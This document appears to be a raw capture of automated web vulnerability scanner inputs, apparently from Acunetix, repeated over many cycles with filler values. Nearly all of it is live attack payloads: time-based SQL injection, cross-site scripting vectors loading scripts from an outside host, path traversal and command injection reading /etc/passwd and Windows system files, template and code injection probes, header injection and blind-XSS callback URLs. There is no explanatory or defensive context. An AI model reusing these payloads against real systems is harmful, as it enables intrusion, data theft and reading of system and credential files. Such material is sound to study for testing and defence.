if(now()=sysdate(),sleep(9.138),0)/*'XOR(if(now()=sysdate(),sleep(9.138),0))OR'"XOR(if(now()=sysdate(),sleep(9.138),0))OR"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932046)>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(9.138)))v)/*'+(select(0)from(select(sleep(9.138)))v)+'"+(select(0)from(select(sleep(9.138)))v)+"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(953575)>

cat /etc/passwd

-1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(992512)>

`cat /etc/passwd`

-1)

1

1

1

${99833+100420}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt%20>prompt(918628)</sCripT>

-1))

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1&n908579=v973784

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

p75QPQln'

)

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

1

<img acu onmouseover=prompt(944512) //>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

LSdElojh')

!(()&&!|*|*|

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

1

1<input autofocus onfocus=prompt(902224)>

testasp.vulnweb.com

^(#$!@#$)(()))******

HDqh3hmp'))

.\./.\./.\./.\./.\./.\./etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'

<a href='http://www.acunetix.com'>website security</a>

'

1

1

1

-1

/etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

1

"

"

1

1

-1)

1_1ZcFU <ScRiPt >prompt(964009)</ScRiPt>

1

1

http://hitTtpTA5ECEV.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

-1))

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

&dir

1yaRiZKX'

1

1

................etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'&dir&'

http://www.acunetix.tst

comments

1

xx7K0U1O')

1

1

'"

1

file:///etc/passwd

3DphAD87'))

1'"()&%<ScRiPt >prompt(973309)</ScRiPt>

comments/.

"&dir&"

1

1

<!--

1

1

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(963863)</ScRiPt>

1

|dir

1

1

1

1

1_917633

WEB-INF/web.xml

1

1

1

'|dir

1

1

1

WEB-INF\web.xml

1

acu6878<s1﹥s2ʺs3ʹuca6878

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

acux8667z1z2abcxuca8667

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(962094)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(984808)</script>

1

windowswin.ini

1

1<ScRiPt >prompt(948114)</ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?905686></ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(998177)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(963268)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(912123)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(992613))>

1

1

response.write(9972292*9253320)

1

1<iframe src='data:text/html

1

'+response.write(9972292*9253320)+'

WEB-INF/web.xml

1

1

1<body onload=prompt(948406)>

"+response.write(9972292*9253320)+"

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(997157)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(901824)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

"&cat /etc/passwd&"

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(937483)>

${99804+99022}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

cat /etc/passwd

1

1

1<ScRiPt%20>prompt(950555)</sCripT>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

-1)

1

1

)

1

1&n948511=v997147

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

-1))

|cat /etc/passwd#

1

1

1

1

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

<img acu onmouseover=prompt(994948) //>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

zJEFtbQt'

'|'ld

1

testasp.vulnweb.com

1

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(915518)>

/etc/passwd

gIxJuhxl')

'"()

"|"ld

1

1

'

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

qD8aHfBG'))

1

1

1

"

1

1

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

1

1

'

1

${@print(md5(acunetix_wvs_security_test))}

1

1_4tLiT <ScRiPt >prompt(950171)</ScRiPt>

................etc/passwd

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

http://hitFRFejvTvko.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1))

1

1

acunetix_wvs_invalid_filename

1

1

||cat /etc/passwd

1

1

JihaLwBO'

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

&dir

puFLTQ3j')

http://www.acunetix.tst

1

1

1

/\../\../\../\../\../\../\../etc/passwd

comments

1

'"

qMd05PY5'))

'&dir&'

1'"()&%<ScRiPt >prompt(957787)</ScRiPt>

1

1

comments/.

1

WEB-INF/web.xml

<!--

1

1

"&dir&"

1

'"()&%<ScRiPt >prompt(909788)</ScRiPt>

1

WEB-INF\web.xml

1

|dir

../../../../../../../../../../windows/win.ini

1

1_999571

1

1

1

'|dir

../../../../../../../../../../boot.ini

1

1

acu3614<s1﹥s2ʺs3ʹuca3614

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

1

1

windowswin.ini

1

acux6651z1z2abcxuca6651

1

................windowswin.ini

1

1

1<ScRiPt >prompt(986327)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<script>prompt(984894)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(904966)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?904543></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<ScRiPt >prompt(930698)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(947928)">

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972108)"></g></svg>

WEB-INF\web.xml

1

1

1

response.write(9474431*9429289)

1<div style=width:expression(prompt(960892))>

1

1

1

&cat /etc/passwd&

'+response.write(9474431*9429289)+'

1

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

"+response.write(9474431*9429289)+"

1<body onload=prompt(903577)>

1

if(now()=sysdate(),sleep(4.843),0)/*'XOR(if(now()=sysdate(),sleep(4.843),0))OR'"XOR(if(now()=sysdate(),sleep(4.843),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(993376)>

1

1

(select(0)from(select(sleep(4.843)))v)/*'+(select(0)from(select(sleep(4.843)))v)+'"+(select(0)from(select(sleep(4.843)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(996232)>

1

1

../../../../../../../../../../etc/passwd.jpg

-1

1

1

`cat /etc/passwd`

1<img/src=">" onerror=alert(971854)>

1

1

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

${100245+100461}

1<ScRiPt%20>prompt(907509)</sCripT>

1

'|'ld

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1&n915324=v940939

1&lt

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

VihkbBlt'

)

1

<img acu onmouseover=prompt(991129) //>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

jiJXy3cl')

1

!(()&&!|*|*|

'"()

testasp.vulnweb.com

1<input autofocus onfocus=prompt(947927)>

RMjEw7hr'))

/etc/passwd

'

1

1

1

^(#$!@#$)(()))******

1

<a href='http://www.acunetix.com'>website security</a>

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

"

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

1

1

1

1

1_VhVNB <ScRiPt >prompt(942229)</ScRiPt>

&dir

${@print(md5(acunetix_wvs_security_test))}

................etc/passwd

-1))

http://hitWOk00YPNBo.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

1

'&dir&'

${@print(md5(acunetix_wvs_security_test))}\

qVF7opD8'

1

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

jwriaMsR')

1

file:///etc/passwd

"&dir&"

1

1

1

comments

http://www.acunetix.tst

1

71J8t2US'))

1

|dir

'"

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(938685)</ScRiPt>

1

comments/.

1

1

1

<!--

'|dir

'"()&%<ScRiPt >prompt(962945)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1

1

WEB-INF\web.xml

1_984440

"|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

acu6109<s1﹥s2ʺs3ʹuca6109

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acux3795z1z2abcxuca3795

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(909759)</ScRiPt>

1

windowswin.ini

1<script>prompt(929239)</script>

1

1

1

1

1<ScRiPt >prompt(945872)</ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?914541></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(970830)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<video><source onerror="javascript:prompt(981301)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998408)"></g></svg>

1

1<div style=width:expression(prompt(902973))>

1

response.write(9755935*9997407)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

'+response.write(9755935*9997407)+'

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(951663)>

"+response.write(9755935*9997407)+"

WEB-INF/web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(915199)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1

1

1<img src=xyz OnErRor=prompt(950567)>

1

../../../../../../../../../../etc/passwd.jpg

1

-1

1

1

1<img/src=">" onerror=alert(972172)>

`cat /etc/passwd`

1

${100343+99870}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

1

1

1<ScRiPt%20>prompt(968954)</sCripT>

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1&lt

1&n905775=v957802

1

)

'|'ld

1some_inexistent_file_with_long_name%00.jpg

<img acu onmouseover=prompt(949680) //>

1

ITpu73y4'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

'"()

1<input autofocus onfocus=prompt(959478)>

"|"ld

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

nMU2SSCE')

1

<a href='http://www.acunetix.com'>website security</a>

1

1

testasp.vulnweb.com

^(#$!@#$)(()))******

4gHQvsCF'))

/etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

-1

1_O7DDz <ScRiPt >prompt(965264)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

1

"

acunetix_wvs_invalid_filename

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

http://hit17HcBsrLqM.bxss.me/

||cat /etc/passwd

-1))

comments

1

................etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

W4LNFVN7'

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'&dir&'

http://www.acunetix.tst

Wglysr25')

comments/.

1

1

file:///etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(961451)</ScRiPt>

IBhXPvJy'))

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

'"()&%<ScRiPt >prompt(904042)</ScRiPt>

1

1

1

|dir

1

WEB-INF/web.xml

1_971021

1

1

1

1

'|dir

1

WEB-INF\web.xml

1

1

"|dir

acu5609<s1﹥s2ʺs3ʹuca5609

1

../../../../../../../../../../windows/win.ini

1

acux5753z1z2abcxuca5753

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(916871)</ScRiPt>

1

1

1<script>prompt(957268)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(905621)</ScRiPt>

1

windowswin.ini

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?996375></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(940592)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<video><source onerror="javascript:prompt(922757)">

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903624)"></g></svg>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(953127))>

1

1

response.write(9967214*9748031)

1

1<iframe src='data:text/html

1

1

'+response.write(9967214*9748031)+'

&cat /etc/passwd&

1

WEB-INF/web.xml

1<body onload=prompt(956956)>

1

1

"+response.write(9967214*9748031)+"

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

'&cat /etc/passwd&'

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(964700)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=xyz OnErRor=prompt(941725)>

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

-1

1

1<img/src=">" onerror=alert(912322)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

1

-1)

1

1

1<ScRiPt%20>prompt(946792)</sCripT>

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

-1))

1

1

1&lt

${99189+99219}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

lCZaehLm'

1

<img acu onmouseover=prompt(979617) //>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1&n998832=v952589

1some_inexistent_file_with_long_name%00.jpg

1

NlkNDmCJ')

)

1<input autofocus onfocus=prompt(990855)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

2RMyLet4'))

!(()&&!|*|*|

<a href='http://www.acunetix.com'>website security</a>

'"()

1

.\./.\./.\./.\./.\./.\./etc/passwd

testasp.vulnweb.com

1

-1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

/etc/passwd

'

1

'

1

-1)

1

1_rlMpH <ScRiPt >prompt(923192)</ScRiPt>

1

1

"

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

1

1

1

1

http://hitnKg51NaKeY.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

w0B6a0hA'

1

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

&dir

................etc/passwd

SjqJCnZX')

1

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

DVRVHjOZ'))

http://www.acunetix.tst

1

comments

1

'"

1

"&dir&"

1

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(913046)</ScRiPt>

comments/.

1

<!--

1

1

|dir

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(965081)</ScRiPt>

1

1

1

1

'|dir

1

WEB-INF/web.xml

1_922282

1

1

"|dir

1

1

1

WEB-INF\web.xml

1

acu8018<s1﹥s2ʺs3ʹuca8018

1

1

1

1

../../../../../../../../../../windows/win.ini

acux4077z1z2abcxuca4077

1

1

1

1

1<ScRiPt >prompt(913225)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1<script>prompt(933993)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(950837)</ScRiPt>

windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936902></ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(941482)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<video><source onerror="javascript:prompt(904433)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(997773)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9554799*9065922)

1<div style=width:expression(prompt(996850))>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9554799*9065922)+'

1<iframe src='data:text/html

&cat /etc/passwd&

1

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1<body onload=prompt(978802)>

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9554799*9065922)+"

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(909689)>

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1<img src=xyz OnErRor=prompt(996809)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

WEB-INF\web.xml

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

`cat /etc/passwd`

1<img/src=">" onerror=alert(994691)>

1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

|cat /etc/passwd#

1<ScRiPt%20>prompt(928883)</sCripT>

1

${99796+100378}

1

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

1

)

1&n910064=v928546

1

"|"ld

<img acu onmouseover=prompt(939543) //>

1

QWIpwB0P'

1some_inexistent_file_with_long_name%00.jpg

/etc/passwd

!(()&&!|*|*|

1

1

1<input autofocus onfocus=prompt(998226)>

VfdXLiVq')

1

'"()

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

1

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

Vn0IsjEB'))

1

'

'

testasp.vulnweb.com

1

1

[url=http://www.acunetix.com]website security[/url]

................etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1

1

1

"

"

1_mcqXA <ScRiPt >prompt(955436)</ScRiPt>

1

1

-1)

1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

file:///etc/passwd

-1))

acunetix_wvs_invalid_filename

1

http://hittffWqIZ44N.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

HacXuX5Z'

/\../\../\../\../\../\../\../etc/passwd

&dir

comments

1

1

1

1

1

1

m4dtY2ZQ')

WEB-INF/web.xml

http://www.acunetix.tst

comments

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'"

1

C8Cf7gct'))

WEB-INF\web.xml

comments/.

1

"&dir&"

1

1'"()&%<ScRiPt >prompt(943783)</ScRiPt>

1

<!--

1

1

1

../../../../../../../../../../windows/win.ini

|dir

1

'"()&%<ScRiPt >prompt(942978)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../boot.ini

'|dir

1_997547

1

../../../../../../../../../../windows/win.ini.jpg

1

1

"|dir

1

1

1

windowswin.ini

1

acu10817<s1﹥s2ʺs3ʹuca10817

1

................windowswin.ini

1

1

acux3213z1z2abcxuca3213

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(954520)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<script>prompt(993545)</script>

1

1

1

1

1<ScRiPt >prompt(967250)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?971850></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(936732)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(942219)">

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(982689)"></g></svg>

1

1

WEB-INF\web.xml

response.write(9352911*9825626)

1

1

1<div style=width:expression(prompt(937691))>

1

1

'+response.write(9352911*9825626)+'

1

1

1<iframe src='data:text/html

1

1

"+response.write(9352911*9825626)+"

1

&cat /etc/passwd&

1<body onload=prompt(960377)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903728)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=xyz OnErRor=prompt(990782)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

-1

1<img/src=">" onerror=alert(928214)>

1

1

1

${100070+99374}

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt%20>prompt(997774)</sCripT>

1

-1)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1&lt

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n913394=v985271

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

'|'ld

1

<img acu onmouseover=prompt(918094) //>

PJgUAVpO'

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

1

"|"ld

1<input autofocus onfocus=prompt(985201)>

EvqoElPk')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

/etc/passwd

^(#$!@#$)(()))******

aIt0QY6X'))

<a href='http://www.acunetix.com'>website security</a>

1

testasp.vulnweb.com

1

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[url=http://www.acunetix.com]website security[/url]

-1

'

1

1

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1_03gKy <ScRiPt >prompt(995088)</ScRiPt>

-1)

http://hitUH9TAW8Rom.bxss.me/

"

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

................etc/passwd

1

1

1

-1))

1

||cat /etc/passwd

comments

1

1

1

9CEadl4k'

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

&dir

file:///etc/passwd

1

cyZioXHI')

1

http://www.acunetix.tst

1

1

'"

comments/.

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

1

1'"()&%<ScRiPt >prompt(907232)</ScRiPt>

slBlFhQM'))

1

1

1

<!--

"&dir&"

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(990185)</ScRiPt>

1

1

1_964317

1

WEB-INF\web.xml

|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

acu7817<s1﹥s2ʺs3ʹuca7817

'|dir

1

1

1

../../../../../../../../../../boot.ini

acux8728z1z2abcxuca8728

1

"|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(944474)</ScRiPt>

1

1

1

windowswin.ini

1

1<script>prompt(992238)</script>

1

1

................windowswin.ini

1

1

